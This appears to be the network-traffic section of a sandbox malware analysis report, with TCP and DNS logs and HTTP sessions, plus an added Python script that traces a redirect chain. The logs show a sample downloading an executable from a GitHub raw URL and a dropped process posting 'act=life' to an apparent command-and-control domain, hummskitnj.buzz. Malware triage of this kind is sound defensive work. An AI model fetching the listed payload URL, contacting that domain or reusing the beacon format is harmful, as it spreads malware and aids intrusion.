                                                                                                        Dec 27, 2024 13:11:04.632426977 CET44349705185.199.108.133192.168.2.5
                                                                                                        Dec 27, 2024 13:11:04.632473946 CET49705443192.168.2.5185.199.108.133
                                                                                                        Dec 27, 2024 13:11:04.638842106 CET44349705185.199.108.133192.168.2.5
                                                                                                        Dec 27, 2024 13:11:04.638864040 CET44349705185.199.108.133192.168.2.5
                                                                                                        Dec 27, 2024 13:11:04.638911009 CET49705443192.168.2.5185.199.108.133
                                                                                                        Dec 27, 2024 13:11:04.638917923 CET44349705185.199.108.133192.168.2.5
                                                                                                        Dec 27, 2024 13:11:04.638963938 CET49705443192.168.2.5185.199.108.133
                                                                                                        Dec 27, 2024 13:11:04.638983965 CET49705443192.168.2.5185.199.108.133
                                                                                                        Dec 27, 2024 13:11:04.646173000 CET44349705185.199.108.133192.168.2.5
                                                                                                        Dec 27, 2024 13:11:04.646188974 CET44349705185.199.108.133192.168.2.5
                                                                                                        Dec 27, 2024 13:11:04.646239042 CET49705443192.168.2.5185.199.108.133
                                                                                                        Dec 27, 2024 13:11:04.646245956 CET44349705185.199.108.133192.168.2.5
                                                                                                        Dec 27, 2024 13:11:04.646286964 CET49705443192.168.2.5185.199.108.133
                                                                                                        Dec 27, 2024 13:11:04.653573990 CET44349705185.199.108.133192.168.2.5
                                                                                                        Dec 27, 2024 13:11:04.653589964 CET44349705185.199.108.133192.168.2.5
                                                                                                        Dec 27, 2024 13:11:04.653645992 CET49705443192.168.2.5185.199.108.133
                                                                                                        Dec 27, 2024 13:11:04.653652906 CET44349705185.199.108.133192.168.2.5
                                                                                                        Dec 27, 2024 13:11:04.653697014 CET49705443192.168.2.5185.199.108.133
                                                                                                        Dec 27, 2024 13:11:04.659018993 CET44349705185.199.108.133192.168.2.5
                                                                                                        Dec 27, 2024 13:11:04.659058094 CET44349705185.199.108.133192.168.2.5
                                                                                                        Dec 27, 2024 13:11:04.659084082 CET49705443192.168.2.5185.199.108.133
                                                                                                        Dec 27, 2024 13:11:04.659090042 CET44349705185.199.108.133192.168.2.5
                                                                                                        Dec 27, 2024 13:11:04.659121037 CET49705443192.168.2.5185.199.108.133
                                                                                                        Dec 27, 2024 13:11:04.659141064 CET49705443192.168.2.5185.199.108.133
                                                                                                        Dec 27, 2024 13:11:04.666327000 CET44349705185.199.108.133192.168.2.5
                                                                                                        Dec 27, 2024 13:11:04.666342974 CET44349705185.199.108.133192.168.2.5
                                                                                                        Dec 27, 2024 13:11:04.666388988 CET49705443192.168.2.5185.199.108.133
                                                                                                        Dec 27, 2024 13:11:04.666399002 CET44349705185.199.108.133192.168.2.5
                                                                                                        Dec 27, 2024 13:11:04.666419029 CET49705443192.168.2.5185.199.108.133
                                                                                                        Dec 27, 2024 13:11:04.666441917 CET49705443192.168.2.5185.199.108.133
                                                                                                        Dec 27, 2024 13:11:04.673841953 CET44349705185.199.108.133192.168.2.5
                                                                                                        Dec 27, 2024 13:11:04.673858881 CET44349705185.199.108.133192.168.2.5
                                                                                                        Dec 27, 2024 13:11:04.673901081 CET49705443192.168.2.5185.199.108.133
                                                                                                        Dec 27, 2024 13:11:04.673909903 CET44349705185.199.108.133192.168.2.5
                                                                                                        Dec 27, 2024 13:11:04.673942089 CET49705443192.168.2.5185.199.108.133
                                                                                                        Dec 27, 2024 13:11:04.673959017 CET49705443192.168.2.5185.199.108.133
                                                                                                        Dec 27, 2024 13:11:04.722353935 CET44349705185.199.108.133192.168.2.5
                                                                                                        Dec 27, 2024 13:11:04.722378969 CET44349705185.199.108.133192.168.2.5
                                                                                                        Dec 27, 2024 13:11:04.722477913 CET49705443192.168.2.5185.199.108.133
                                                                                                        Dec 27, 2024 13:11:04.722490072 CET44349705185.199.108.133192.168.2.5
                                                                                                        Dec 27, 2024 13:11:04.722569942 CET49705443192.168.2.5185.199.108.133
                                                                                                        Dec 27, 2024 13:11:04.824208975 CET44349705185.199.108.133192.168.2.5
                                                                                                        Dec 27, 2024 13:11:04.824228048 CET44349705185.199.108.133192.168.2.5
                                                                                                        Dec 27, 2024 13:11:04.824328899 CET49705443192.168.2.5185.199.108.133
                                                                                                        Dec 27, 2024 13:11:04.824345112 CET44349705185.199.108.133192.168.2.5
                                                                                                        Dec 27, 2024 13:11:04.824496031 CET49705443192.168.2.5185.199.108.133
                                                                                                        Dec 27, 2024 13:11:04.830599070 CET44349705185.199.108.133192.168.2.5
                                                                                                        Dec 27, 2024 13:11:04.830615044 CET44349705185.199.108.133192.168.2.5
                                                                                                        Dec 27, 2024 13:11:04.830692053 CET49705443192.168.2.5185.199.108.133
                                                                                                        Dec 27, 2024 13:11:04.830699921 CET44349705185.199.108.133192.168.2.5
                                                                                                        Dec 27, 2024 13:11:04.830741882 CET49705443192.168.2.5185.199.108.133
                                                                                                        Dec 27, 2024 13:11:04.837987900 CET44349705185.199.108.133192.168.2.5
                                                                                                        Dec 27, 2024 13:11:04.838002920 CET44349705185.199.108.133192.168.2.5
                                                                                                        Dec 27, 2024 13:11:04.838077068 CET49705443192.168.2.5185.199.108.133
                                                                                                        Dec 27, 2024 13:11:04.838084936 CET44349705185.199.108.133192.168.2.5
                                                                                                        Dec 27, 2024 13:11:04.838140965 CET49705443192.168.2.5185.199.108.133
                                                                                                        Dec 27, 2024 13:11:13.779083967 CET44349713172.67.216.236192.168.2.5
                                                                                                        Dec 27, 2024 13:11:13.779155970 CET49713443192.168.2.5172.67.216.236
                                                                                                        Dec 27, 2024 13:11:13.779814959 CET49713443192.168.2.5172.67.216.236
                                                                                                        Dec 27, 2024 13:11:13.779827118 CET44349713172.67.216.236192.168.2.5
                                                                                                        Dec 27, 2024 13:11:15.037564039 CET44349713172.67.216.236192.168.2.5
                                                                                                        Dec 27, 2024 13:11:15.042052031 CET49713443192.168.2.5172.67.216.236
                                                                                                        Dec 27, 2024 13:11:15.042052031 CET49713443192.168.2.5172.67.216.236
                                                                                                        Dec 27, 2024 13:11:15.042064905 CET44349713172.67.216.236192.168.2.5
                                                                                                        Dec 27, 2024 13:11:15.042260885 CET44349713172.67.216.236192.168.2.5
                                                                                                        Dec 27, 2024 13:11:15.048849106 CET49713443192.168.2.5172.67.216.236
                                                                                                        Dec 27, 2024 13:11:15.049573898 CET49713443192.168.2.5172.67.216.236
                                                                                                        Dec 27, 2024 13:11:15.049602032 CET44349713172.67.216.236192.168.2.5
                                                                                                        Dec 27, 2024 13:11:15.049712896 CET49713443192.168.2.5172.67.216.236
                                                                                                        Dec 27, 2024 13:11:15.095335007 CET44349713172.67.216.236192.168.2.5
                                                                                                        Dec 27, 2024 13:11:15.889617920 CET44349713172.67.216.236192.168.2.5
                                                                                                        Dec 27, 2024 13:11:15.889702082 CET44349713172.67.216.236192.168.2.5
                                                                                                        Dec 27, 2024 13:11:15.889767885 CET49713443192.168.2.5172.67.216.236
                                                                                                        Dec 27, 2024 13:11:15.889944077 CET49713443192.168.2.5172.67.216.236
                                                                                                        Dec 27, 2024 13:11:15.889962912 CET44349713172.67.216.236192.168.2.5
                                                                                                        Dec 27, 2024 13:11:16.084620953 CET49715443192.168.2.5172.67.216.236
                                                                                                        Dec 27, 2024 13:11:16.084662914 CET44349715172.67.216.236192.168.2.5
                                                                                                        Dec 27, 2024 13:11:16.084742069 CET49715443192.168.2.5172.67.216.236
                                                                                                        Dec 27, 2024 13:11:16.085130930 CET49715443192.168.2.5172.67.216.236
                                                                                                        Dec 27, 2024 13:11:16.085144997 CET44349715172.67.216.236192.168.2.5
                                                                                                        Dec 27, 2024 13:11:17.342175007 CET44349715172.67.216.236192.168.2.5
                                                                                                        Dec 27, 2024 13:11:17.342319965 CET49715443192.168.2.5172.67.216.236
                                                                                                        Dec 27, 2024 13:11:17.343888998 CET49715443192.168.2.5172.67.216.236
                                                                                                        Dec 27, 2024 13:11:17.343900919 CET44349715172.67.216.236192.168.2.5
                                                                                                        Dec 27, 2024 13:11:17.344135046 CET44349715172.67.216.236192.168.2.5
                                                                                                        Dec 27, 2024 13:11:17.345314980 CET49715443192.168.2.5172.67.216.236
                                                                                                        Dec 27, 2024 13:11:17.345458031 CET49715443192.168.2.5172.67.216.236
                                                                                                        Dec 27, 2024 13:11:17.345489025 CET44349715172.67.216.236192.168.2.5
                                                                                                        Dec 27, 2024 13:11:17.345552921 CET49715443192.168.2.5172.67.216.236
                                                                                                        Dec 27, 2024 13:11:17.345566988 CET44349715172.67.216.236192.168.2.5
                                                                                                        Dec 27, 2024 13:11:18.331973076 CET44349715172.67.216.236192.168.2.5
                                                                                                        Dec 27, 2024 13:11:18.332061052 CET44349715172.67.216.236192.168.2.5
                                                                                                        Dec 27, 2024 13:11:18.332297087 CET49715443192.168.2.5172.67.216.236
                                                                                                        Dec 27, 2024 13:11:18.332472086 CET49715443192.168.2.5172.67.216.236
                                                                                                        Dec 27, 2024 13:11:18.332485914 CET44349715172.67.216.236192.168.2.5
                                                                                                        Dec 27, 2024 13:11:18.761581898 CET49725443192.168.2.5172.67.216.236
                                                                                                        Dec 27, 2024 13:11:18.761650085 CET44349725172.67.216.236192.168.2.5
                                                                                                        Dec 27, 2024 13:11:18.761753082 CET49725443192.168.2.5172.67.216.236
                                                                                                        Dec 27, 2024 13:11:18.762173891 CET49725443192.168.2.5172.67.216.236
                                                                                                        Dec 27, 2024 13:11:18.762202024 CET44349725172.67.216.236192.168.2.5
                                                                                                        Dec 27, 2024 13:11:19.972466946 CET44349725172.67.216.236192.168.2.5
                                                                                                        Dec 27, 2024 13:11:19.972668886 CET49725443192.168.2.5172.67.216.236
                                                                                                        Dec 27, 2024 13:11:19.973933935 CET49725443192.168.2.5172.67.216.236
                                                                                                        Dec 27, 2024 13:11:19.973988056 CET44349725172.67.216.236192.168.2.5
                                                                                                        Dec 27, 2024 13:11:19.974245071 CET44349725172.67.216.236192.168.2.5
                                                                                                        Dec 27, 2024 13:11:19.981911898 CET49725443192.168.2.5172.67.216.236
                                                                                                        Dec 27, 2024 13:11:19.982007027 CET49725443192.168.2.5172.67.216.236
                                                                                                        Dec 27, 2024 13:11:19.982018948 CET44349725172.67.216.236192.168.2.5
                                                                                                        Dec 27, 2024 13:11:20.738729000 CET44349725172.67.216.236192.168.2.5
                                                                                                        Dec 27, 2024 13:11:20.738811970 CET44349725172.67.216.236192.168.2.5
                                                                                                        Dec 27, 2024 13:11:20.738884926 CET49725443192.168.2.5172.67.216.236
                                                                                                        Dec 27, 2024 13:11:20.739056110 CET49725443192.168.2.5172.67.216.236
                                                                                                        Dec 27, 2024 13:11:20.739100933 CET44349725172.67.216.236192.168.2.5
                                                                                                        Dec 27, 2024 13:11:21.157310009 CET49733443192.168.2.5172.67.216.236
                                                                                                        Dec 27, 2024 13:11:21.157351971 CET44349733172.67.216.236192.168.2.5
                                                                                                        Dec 27, 2024 13:11:21.157422066 CET49733443192.168.2.5172.67.216.236
                                                                                                        Dec 27, 2024 13:11:21.157764912 CET49733443192.168.2.5172.67.216.236
                                                                                                        Dec 27, 2024 13:11:21.157778025 CET44349733172.67.216.236192.168.2.5
                                                                                                        Dec 27, 2024 13:11:22.467117071 CET44349733172.67.216.236192.168.2.5
                                                                                                        Dec 27, 2024 13:11:22.467303038 CET49733443192.168.2.5172.67.216.236
                                                                                                        Dec 27, 2024 13:11:22.468312979 CET49733443192.168.2.5172.67.216.236
                                                                                                        Dec 27, 2024 13:11:22.468322039 CET44349733172.67.216.236192.168.2.5
                                                                                                        Dec 27, 2024 13:11:22.468550920 CET44349733172.67.216.236192.168.2.5
                                                                                                        Dec 27, 2024 13:11:22.469634056 CET49733443192.168.2.5172.67.216.236
                                                                                                        Dec 27, 2024 13:11:22.470299959 CET49733443192.168.2.5172.67.216.236
                                                                                                        Dec 27, 2024 13:11:22.470331907 CET44349733172.67.216.236192.168.2.5
                                                                                                        Dec 27, 2024 13:11:22.470422029 CET49733443192.168.2.5172.67.216.236
                                                                                                        Dec 27, 2024 13:11:22.470453978 CET44349733172.67.216.236192.168.2.5
                                                                                                        Dec 27, 2024 13:11:22.470551968 CET49733443192.168.2.5172.67.216.236
                                                                                                        Dec 27, 2024 13:11:22.470582008 CET44349733172.67.216.236192.168.2.5
                                                                                                        Dec 27, 2024 13:11:22.470895052 CET49733443192.168.2.5172.67.216.236
                                                                                                        Dec 27, 2024 13:11:22.470922947 CET44349733172.67.216.236192.168.2.5
                                                                                                        Dec 27, 2024 13:11:22.471204996 CET49733443192.168.2.5172.67.216.236
                                                                                                        Dec 27, 2024 13:11:22.471232891 CET44349733172.67.216.236192.168.2.5
                                                                                                        Dec 27, 2024 13:11:22.471375942 CET49733443192.168.2.5172.67.216.236
                                                                                                        Dec 27, 2024 13:11:22.471402884 CET44349733172.67.216.236192.168.2.5
                                                                                                        Dec 27, 2024 13:11:22.471410990 CET49733443192.168.2.5172.67.216.236
                                                                                                        Dec 27, 2024 13:11:22.471560955 CET49733443192.168.2.5172.67.216.236
                                                                                                        Dec 27, 2024 13:11:22.471590042 CET49733443192.168.2.5172.67.216.236
                                                                                                        Dec 27, 2024 13:11:22.519335032 CET44349733172.67.216.236192.168.2.5
                                                                                                        Dec 27, 2024 13:11:22.519507885 CET49733443192.168.2.5172.67.216.236
                                                                                                        Dec 27, 2024 13:11:22.519551039 CET49733443192.168.2.5172.67.216.236
                                                                                                        Dec 27, 2024 13:11:22.519565105 CET49733443192.168.2.5172.67.216.236
                                                                                                        Dec 27, 2024 13:11:22.567320108 CET44349733172.67.216.236192.168.2.5
                                                                                                        Dec 27, 2024 13:11:22.567503929 CET49733443192.168.2.5172.67.216.236
                                                                                                        Dec 27, 2024 13:11:22.567549944 CET49733443192.168.2.5172.67.216.236
                                                                                                        Dec 27, 2024 13:11:22.567585945 CET49733443192.168.2.5172.67.216.236
                                                                                                        Dec 27, 2024 13:11:22.615319967 CET44349733172.67.216.236192.168.2.5
                                                                                                        Dec 27, 2024 13:11:22.615453005 CET49733443192.168.2.5172.67.216.236
                                                                                                        Dec 27, 2024 13:11:22.663335085 CET44349733172.67.216.236192.168.2.5
                                                                                                        Dec 27, 2024 13:11:22.830867052 CET44349733172.67.216.236192.168.2.5
                                                                                                        Dec 27, 2024 13:11:25.741441011 CET44349733172.67.216.236192.168.2.5
                                                                                                        Dec 27, 2024 13:11:25.741544962 CET44349733172.67.216.236192.168.2.5
                                                                                                        Dec 27, 2024 13:11:25.741610050 CET49733443192.168.2.5172.67.216.236
                                                                                                        Dec 27, 2024 13:11:25.745089054 CET49733443192.168.2.5172.67.216.236
                                                                                                        Dec 27, 2024 13:11:25.745111942 CET44349733172.67.216.236192.168.2.5
                                                                                                        Dec 27, 2024 13:11:25.772902966 CET49744443192.168.2.5172.67.216.236
                                                                                                        Dec 27, 2024 13:11:25.772933960 CET44349744172.67.216.236192.168.2.5
                                                                                                        Dec 27, 2024 13:11:25.773106098 CET49744443192.168.2.5172.67.216.236
                                                                                                        Dec 27, 2024 13:11:25.773317099 CET49744443192.168.2.5172.67.216.236
                                                                                                        Dec 27, 2024 13:11:25.773329973 CET44349744172.67.216.236192.168.2.5
                                                                                                        Dec 27, 2024 13:11:27.031424999 CET44349744172.67.216.236192.168.2.5
                                                                                                        Dec 27, 2024 13:11:27.031636953 CET49744443192.168.2.5172.67.216.236
                                                                                                        Dec 27, 2024 13:11:27.032902002 CET49744443192.168.2.5172.67.216.236
                                                                                                        Dec 27, 2024 13:11:27.032912016 CET44349744172.67.216.236192.168.2.5
                                                                                                        Dec 27, 2024 13:11:27.033147097 CET44349744172.67.216.236192.168.2.5
                                                                                                        Dec 27, 2024 13:11:27.034471035 CET49744443192.168.2.5172.67.216.236
                                                                                                        Dec 27, 2024 13:11:27.034492970 CET49744443192.168.2.5172.67.216.236
                                                                                                        Dec 27, 2024 13:11:27.034540892 CET44349744172.67.216.236192.168.2.5
                                                                                                        Dec 27, 2024 13:11:28.083266020 CET44349744172.67.216.236192.168.2.5
                                                                                                        Dec 27, 2024 13:11:28.083359957 CET44349744172.67.216.236192.168.2.5
                                                                                                        Dec 27, 2024 13:11:28.083419085 CET49744443192.168.2.5172.67.216.236
                                                                                                        Dec 27, 2024 13:11:28.083611012 CET49744443192.168.2.5172.67.216.236
                                                                                                        Dec 27, 2024 13:11:28.083625078 CET44349744172.67.216.236192.168.2.5
                                                                                                        Dec 27, 2024 13:11:28.083638906 CET49744443192.168.2.5172.67.216.236
                                                                                                        Dec 27, 2024 13:11:28.083643913 CET44349744172.67.216.236192.168.2.5
Timestamp                            Source Port  Dest Port  Source IP    Dest IP
Dec 27, 2024 13:10:58.300035000 CET  53461        53         192.168.2.5  1.1.1.1
Dec 27, 2024 13:10:58.436963081 CET  53           53461      1.1.1.1      192.168.2.5
Dec 27, 2024 13:11:01.256370068 CET  60559        53         192.168.2.5  1.1.1.1
Dec 27, 2024 13:11:01.393217087 CET  53           60559      1.1.1.1      192.168.2.5
Dec 27, 2024 13:11:05.693064928 CET  49736        53         192.168.2.5  1.1.1.1
Dec 27, 2024 13:11:05.993191957 CET  53           49736      1.1.1.1      192.168.2.5
Timestamp                            Source IP    Dest IP  Trans ID  OP Code             Name                       Type            Class        DNS over HTTPS
Dec 27, 2024 13:10:58.300035000 CET  192.168.2.5  1.1.1.1  0xf002    Standard query (0)  github.com                 A (IP address)  IN (0x0001)  false
Dec 27, 2024 13:11:01.256370068 CET  192.168.2.5  1.1.1.1  0x6ee9    Standard query (0)  raw.githubusercontent.com  A (IP address)  IN (0x0001)  false
Dec 27, 2024 13:11:05.693064928 CET  192.168.2.5  1.1.1.1  0x5e6d    Standard query (0)  hummskitnj.buzz            A (IP address)  IN (0x0001)  false
Timestamp                            Source IP  Dest IP      Trans ID  Reply Code    Name                       CName  Address          Type            Class        DNS over HTTPS
Dec 27, 2024 13:10:58.436963081 CET  1.1.1.1    192.168.2.5  0xf002    No error (0)  github.com                        20.233.83.145    A (IP address)  IN (0x0001)  false
Dec 27, 2024 13:11:01.393217087 CET  1.1.1.1    192.168.2.5  0x6ee9    No error (0)  raw.githubusercontent.com         185.199.108.133  A (IP address)  IN (0x0001)  false
Dec 27, 2024 13:11:01.393217087 CET  1.1.1.1    192.168.2.5  0x6ee9    No error (0)  raw.githubusercontent.com         185.199.109.133  A (IP address)  IN (0x0001)  false
Dec 27, 2024 13:11:01.393217087 CET  1.1.1.1    192.168.2.5  0x6ee9    No error (0)  raw.githubusercontent.com         185.199.110.133  A (IP address)  IN (0x0001)  false
Dec 27, 2024 13:11:01.393217087 CET  1.1.1.1    192.168.2.5  0x6ee9    No error (0)  raw.githubusercontent.com         185.199.111.133  A (IP address)  IN (0x0001)  false
Dec 27, 2024 13:11:05.993191957 CET  1.1.1.1    192.168.2.5  0x5e6d    No error (0)  hummskitnj.buzz                   172.67.216.236   A (IP address)  IN (0x0001)  false
Dec 27, 2024 13:11:05.993191957 CET  1.1.1.1    192.168.2.5  0x5e6d    No error (0)  hummskitnj.buzz                   104.21.86.82     A (IP address)  IN (0x0001)  false
                                                                                                        • github.com
                                                                                                        • raw.githubusercontent.com
                                                                                                        • hummskitnj.buzz
Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
0           192.168.2.5  49704        20.233.83.145   443               4744  C:\Users\user\Desktop\OiMp3TH.exe

Timestamp                Bytes transferred  Direction  Data
2024-12-27 12:11:00 UTC  115                OUT        GET /arizaseeen/ariiiza/raw/refs/heads/main/tpuyikkdktyh.exe HTTP/1.1
                                                       Host: github.com
                                                       Connection: Keep-Alive
2024-12-27 12:11:01 UTC  566                IN         HTTP/1.1 302 Found
                                                       Server: GitHub.com
                                                       Date: Fri, 27 Dec 2024 12:11:00 GMT
                                                       Content-Type: text/html; charset=utf-8
                                                       Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
                                                       Access-Control-Allow-Origin:
                                                       Location: https://raw.githubusercontent.com/arizaseeen/ariiiza/refs/heads/main/tpuyikkdktyh.exe
                                                       Cache-Control: no-cache
                                                       Strict-Transport-Security: max-age=31536000; includeSubdomains; preload
                                                       X-Frame-Options: deny
                                                       X-Content-Type-Options: nosniff
                                                       X-XSS-Protection: 0
                                                       Referrer-Policy: no-referrer-when-downgrade
2024-12-27 12:11:01 UTC  3380               IN         Data Raw: 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 3a 20 64 65 66 61 75 6c 74 2d 73 72 63 20 27 6e 6f 6e 65 27 3b 20 62 61 73 65 2d 75 72 69 20 27 73 65 6c 66 27 3b 20 63 68 69 6c 64 2d 73 72 63 20 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 20 67 69 74 68 75 62 2e 63 6f 6d 2f 77 65 62 70 61 63 6b 2f 20 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2f 20 67 69 73 74 2e 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 3b 20 63 6f 6e 6e 65 63 74 2d 73 72 63 20 27 73 65 6c 66 27 20 75 70 6c 6f 61 64 73 2e 67 69 74 68 75 62 2e 63 6f 6d 20 77 77 77 2e 67 69 74 68 75 62 73 74 61 74 75 73 2e 63 6f 6d 20 63 6f 6c 6c 65 63 74 6f 72 2e 67 69 74 68 75 62 2e 63 6f
                                                       Data Ascii: Content-Security-Policy: default-src 'none'; base-uri 'self'; child-src github.com/assets-cdn/worker/ github.com/webpack/ github.com/assets/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com www.githubstatus.com collector.github.co
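The two HTTPS sessions in this section are one download in two hops: a GET to github.com for a .exe under a /raw/ path, answered with a 302 whose Location points at raw.githubusercontent.com, then the 200 there with an application/octet-stream body of 1282560 bytes. Both requests carry only Host and Connection headers and no User-Agent. The snippet below is an added example, not part of the report: it parses the captured header blocks (copied from the two sessions; bodies and GitHub's long Content-Security-Policy header are left out), checks that the second request is exactly the URL the first response redirected to, and records the observations a triage note would carry. The minimal header parser, the https scheme assumed from port 443, and the executable-extension list are this example's own.

```python
"""Link the redirect and the payload fetch captured in the report's HTTP
sessions (added example; header blocks are copied from the report)."""
from urllib.parse import urlsplit

# Request/response header blocks copied from sessions 0 and 1 of the report.
# Bodies and the long Content-Security-Policy header are omitted.
SESSIONS = [
    (   # session 0: github.com answers with a redirect
        "GET /arizaseeen/ariiiza/raw/refs/heads/main/tpuyikkdktyh.exe HTTP/1.1\r\n"
        "Host: github.com\r\n"
        "Connection: Keep-Alive\r\n",
        "HTTP/1.1 302 Found\r\n"
        "Server: GitHub.com\r\n"
        "Content-Type: text/html; charset=utf-8\r\n"
        "Location: https://raw.githubusercontent.com/arizaseeen/ariiiza/refs/heads/main/tpuyikkdktyh.exe\r\n",
    ),
    (   # session 1: raw.githubusercontent.com serves the binary
        "GET /arizaseeen/ariiiza/refs/heads/main/tpuyikkdktyh.exe HTTP/1.1\r\n"
        "Host: raw.githubusercontent.com\r\n"
        "Connection: Keep-Alive\r\n",
        "HTTP/1.1 200 OK\r\n"
        "Connection: close\r\n"
        "Content-Length: 1282560\r\n"
        "Content-Type: application/octet-stream\r\n"
        'ETag: "45d4ed74921880f3144c9c2424c6d6cf3800d17328f5f3454666b5242bde0db8"\r\n',
    ),
]

EXECUTABLE_EXT = (".exe", ".dll", ".scr", ".msi")   # this example's own list
REDIRECTS = {301, 302, 303, 307, 308}


def parse_http(raw):
    """Split a header block into (start line, {lower-cased name: value})."""
    lines = raw.strip("\r\n").split("\r\n")
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return lines[0], headers


def request_url(req_raw, scheme="https"):
    """Rebuild the absolute URL of a request; https is assumed (port 443 sessions)."""
    start, hdrs = parse_http(req_raw)
    _, path, _ = start.split(" ", 2)
    return f"{scheme}://{hdrs.get('host', '')}{path}"


def analyse_chain(sessions):
    """Walk the sessions in order, verifying that each redirect's Location is
    the URL actually requested next, and collect triage observations."""
    hops, notes, expected = [], [], None
    for req_raw, resp_raw in sessions:
        _, req = parse_http(req_raw)
        resp_start, resp = parse_http(resp_raw)
        url = request_url(req_raw)
        status = int(resp_start.split(" ", 2)[1])
        if expected is not None and url != expected:
            notes.append(f"redirect to {expected} not followed; next request was {url}")
        if "user-agent" not in req:
            notes.append(f"no User-Agent on request to {req.get('host')}")
        if urlsplit(url).path.lower().endswith(EXECUTABLE_EXT):
            notes.append(f"executable path requested from {req.get('host')}")
        hops.append((url, status))
        expected = resp.get("location") if status in REDIRECTS else None
    _, last_resp = parse_http(sessions[-1][1])
    return {
        "hops": hops,
        "chain_intact": not any(n.startswith("redirect to") for n in notes),
        "content_type": last_resp.get("content-type"),
        "content_length": int(last_resp.get("content-length", "0")),
        "notes": notes,
    }


if __name__ == "__main__":
    result = analyse_chain(SESSIONS)
    for url, status in result["hops"]:
        print(f"{status}  {url}")
    print(f"final body: {result['content_type']} ({result['content_length']} bytes), "
          f"chain intact: {result['chain_intact']}")
    for note in result["notes"]:
        print(" -", note)
```

Run against the two captured sessions it reports an intact github.com → raw.githubusercontent.com chain ending in a 1282560-byte application/octet-stream body, with the missing User-Agent and the .exe path flagged on both hops; the same function applied to a proxy log export will also surface chains where a redirect was issued but never followed.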


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        1192.168.2.549705185.199.108.1334434744C:\Users\user\Desktop\OiMp3TH.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-27 12:11:02 UTC | 126 | OUT | GET /arizaseeen/ariiiza/refs/heads/main/tpuyikkdktyh.exe HTTP/1.1
    Host: raw.githubusercontent.com
    Connection: Keep-Alive
2024-12-27 12:11:03 UTC | 904 | IN | HTTP/1.1 200 OK
    Connection: close
    Content-Length: 1282560
    Cache-Control: max-age=300
    Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
    Content-Type: application/octet-stream
    ETag: "45d4ed74921880f3144c9c2424c6d6cf3800d17328f5f3454666b5242bde0db8"
    Strict-Transport-Security: max-age=31536000
    X-Content-Type-Options: nosniff
    X-Frame-Options: deny
    X-XSS-Protection: 1; mode=block
    X-GitHub-Request-Id: 9767:18BB3B:15C7452:187ABB9:676E9944
    Accept-Ranges: bytes
    Date: Fri, 27 Dec 2024 12:11:02 GMT
    Via: 1.1 varnish
    X-Served-By: cache-nyc-kteb1890081-NYC
    X-Cache: MISS
    X-Cache-Hits: 0
    X-Timer: S1735301463.885737,VS0,VE52
    Vary: Authorization,Accept-Encoding,Origin
    Access-Control-Allow-Origin: *
    Cross-Origin-Resource-Policy: cross-origin
    X-Fastly-Request-ID: c8e241bc11570946abad278fcae3532d02464524
    Expires: Fri, 27 Dec 2024 12:16:02 GMT
    Source-Age: 0
2024-12-27 12:11:03 UTC | 1378 | IN | Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PELYig@;@ `-
(further 1378-byte IN data chunks at 2024-12-27 12:11:03 UTC carry the body of the downloaded file; raw hex and ASCII dumps omitted)


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.5 | 49706 | 172.67.216.236 | 443 | 6396 | C:\nhrhvnf\ghhqoznpon_638708802577261661.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-27 12:11:07 UTC | 262 | OUT | POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 8
    Host: hummskitnj.buzz
2024-12-27 12:11:07 UTC | 8 | OUT | Data Raw: 61 63 74 3d 6c 69 66 65
    Data Ascii: act=life
2024-12-27 12:11:08 UTC | 1118 | IN | HTTP/1.1 200 OK
    Date: Fri, 27 Dec 2024 12:11:08 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: close
    Set-Cookie: PHPSESSID=jsoo0n2ad9rll5o1l24gnmg40a; expires=Tue, 22 Apr 2025 05:57:46 GMT; Max-Age=9999999; path=/
    Expires: Thu, 19 Nov 1981 08:52:00 GMT
    Cache-Control: no-store, no-cache, must-revalidate
    Pragma: no-cache
    X-Frame-Options: DENY
    X-Content-Type-Options: nosniff
    X-XSS-Protection: 1; mode=block
    cf-cache-status: DYNAMIC
    vary: accept-encoding
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=xMaxxFMt9zTHSsQPeHELpznfdFvPnldI0087BLivlR5EfTmycJnbav7D0QCYOvTizkwYIqunbkZOitRPdKeW8diNsMNUMO4QIdazwDVqjQBJTld2ASgkSOiTE2B67GUbf8g%3D"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 8f89361c9b5e7c90-EWR
    alt-svc: h3=":443"; ma=86400
    server-timing: cfL4;desc="?proto=TCP&rtt=2012&min_rtt=2010&rtt_var=758&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2837&recv_bytes=906&delivery_rate=1440552&cwnd=252&unsent_bytes=0&cid=e7107146d59a5d38&ts=1006&x=0"
2024-12-27 12:11:08 UTC | 7 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a
    Data Ascii: 2ok
2024-12-27 12:11:08 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
    Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.5 | 49707 | 172.67.216.236 | 443 | 6396 | C:\nhrhvnf\ghhqoznpon_638708802577261661.exe
Timestamp | Bytes transferred | Direction | Data
